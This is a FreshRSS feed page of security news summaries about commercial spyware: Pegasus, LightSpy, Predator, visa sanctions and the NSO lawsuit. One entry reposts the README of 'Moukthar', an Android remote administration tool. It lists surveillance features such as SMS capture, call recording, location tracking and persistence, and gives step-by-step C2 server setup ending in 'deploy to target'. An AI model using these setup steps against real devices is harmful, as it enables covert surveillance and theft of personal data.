FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
โ˜ท
โ–ณ ๐Ÿ”ƒ
There are new available articles, click to refresh the page.
Yesterday โ€” May 3rd 2024Your RSS feeds
Before yesterdayYour RSS feeds

U.S. Imposes Visa Restrictions on 13 Linked to Commercial Spyware Misuse

By: Newsroom
The U.S. Department of State on Monday said it's taking steps to impose visa restrictions on 13 individuals who are allegedly involved in the development and sale of commercial spyware or who are immediately family members of those involved in such businesses. "These individuals have facilitated or derived financial benefit from the misuse of this technology, which

Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users

By: Newsroom
Cybersecurity researchers have discovered a "renewed" cyber espionage campaign targeting users in South Asia with the aim of delivering an Apple iOS spyware implant called LightSpy. "The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular framework with extensive spying features," the BlackBerry Threat Research and Intelligence Team said in a report published last

Apple Updates Spyware Alert System to Warn Victims of Mercenary Attacks

By: Newsroom
Apple on Wednesday revised its documentation pertaining to its mercenary spyware threat notification system to mention that it alerts users when they may have been individually targeted by such attacks. It also specifically called out companies like NSO Group for developing commercial surveillance tools such as Pegasus that are used by state actors to pull off "individually targeted

Moukthar - Android Remote Administration Tool

By: Zion3R


Remote adminitration tool for android


Features
  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

Installation
  • Clone repository console git clone https://github.com/Tomiwa-Ot/moukthar.git
  • Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
  • Set database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
  • Modify /etc/apache2/apache2.conf xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
  • Set C2 server and web socket server address in client functionality/Utils.java ```java public static final String C2_SERVER = "http://localhost";

public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target


TODO
  • Auto scroll logs on dashboard


U.S. Court Orders NSO Group to Hand Over Pegasus Spyware Code to WhatsApp

By: Newsroom
A U.S. judge has ordered NSO Group to hand over its source code for&nbsp;Pegasus&nbsp;and other remote access trojans to Meta as part of the social media giant's ongoing litigation against the Israeli spyware vendor. The decision marks a major legal victory for Meta, which&nbsp;filed the lawsuit&nbsp;in October 2019 for using its infrastructure to&nbsp;distribute the spyware&nbsp;to

FTC Slams Avast with $16.5 Million Fine for Selling Users' Browsing Data

By: Newsroom
The U.S. Federal Trade Commission (FTC) has hit antivirus vendor Avast with a $16.5 million fine over charges that the firm sold users' browsing data to advertisers after claiming its products would block online tracking. In addition, the company has been banned from selling or licensing any web browsing data for advertising purposes. It will also have to notify users whose browsing data was

Meta Warns of 8 Spyware Firms Targeting iOS, Android, and Windows Devices

By: Newsroom
Meta Platforms said it took a series of steps to curtail malicious activity from eight different firms based in Italy, Spain, and the United Arab Emirates (U.A.E.) operating in the surveillance-for-hire industry. The findings are part of its&nbsp;Adversarial Threat Report&nbsp;for the fourth quarter of 2023. The spyware targeted iOS, Android, and Windows devices. "Their various malware included

Global Coalition and Tech Giants Unite Against Commercial Spyware Abuse

By: Newsroom
A coalition of dozens of countries, including France, the U.K., and the U.S., along with tech companies such as Google, MDSec, Meta, and Microsoft, have signed a joint agreement to curb the abuse of commercial spyware to commit human rights abuses. The initiative, dubbed the&nbsp;Pall Mall Process, aims to tackle the proliferation and irresponsible use of commercial cyber intrusion tools by

U.S. Imposes Visa Restrictions on those Involved in Illegal Spyware Surveillance

By: Newsroom
The U.S. State Department said it's implementing a new policy that imposes visa restrictions on individuals who are linked to the illegal use of commercial spyware to surveil civil society members. "The&nbsp;misuse of commercial spyware&nbsp;threatens privacy and freedoms of expression, peaceful assembly, and association," Secretary of State Antony Blinken&nbsp;said. "Such targeting has been

Pegasus Spyware Targeted iPhones of Journalists and Activists in Jordan

By: Newsroom
The iPhones belonging to nearly three dozen journalists, activists, human rights lawyers, and civil society members in Jordan have been targeted with NSO Group's Pegasus spyware, according to joint findings from Access Now and the Citizen Lab. Nine of the 35 individuals have been&nbsp;publicly confirmed&nbsp;as&nbsp;targeted, out of whom six had their devices compromised with the mercenary

New iShutdown Method Exposes Hidden Spyware Like Pegasus on Your iPhone

By: Newsroom
Cybersecurity researchers have identified a "lightweight method" called&nbsp;iShutdown&nbsp;for reliably identifying signs of spyware on Apple iOS devices, including notorious threats like NSO Group's&nbsp;Pegasus, QuaDream's&nbsp;Reign, and Intellexa's&nbsp;Predator.&nbsp; Kaspersky, which analyzed a set of iPhones that were compromised with Pegasus, said the infections left traces in a file

Most Sophisticated iPhone Hack Ever Exploited Apple's Hidden Hardware Feature

By: Newsroom
The&nbsp;Operation Triangulation&nbsp;spyware attacks targeting Apple iOS devices leveraged never-before-seen exploits that made it possible to even bypass pivotal hardware-based security protections erected by the company. Russian cybersecurity firm Kaspersky, which&nbsp;discovered&nbsp;the&nbsp;campaign&nbsp;at the beginning of 2023 after becoming one of the targets,&nbsp;described&nbsp;it as

Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities

By: Newsroom
Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering. The activity, first detected in October 2023, has been codenamed&nbsp;Operation RusticWeb&nbsp;by enterprise security firm SEQRITE. "New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate

Experts Detail Multi-Million Dollar Licensing Model of Predator Spyware

By: Newsroom
A new analysis of the sophisticated commercial spyware called Predator has revealed that its ability to persist between reboots is offered as an "add-on feature" and that it depends on the licensing options opted by a customer. "In 2021, Predator spyware couldn't survive a reboot on the infected Android system (it had it on iOS)," Cisco Talos researchers Mike Gentile, Asheer Malhotra, and Vitor
โŒ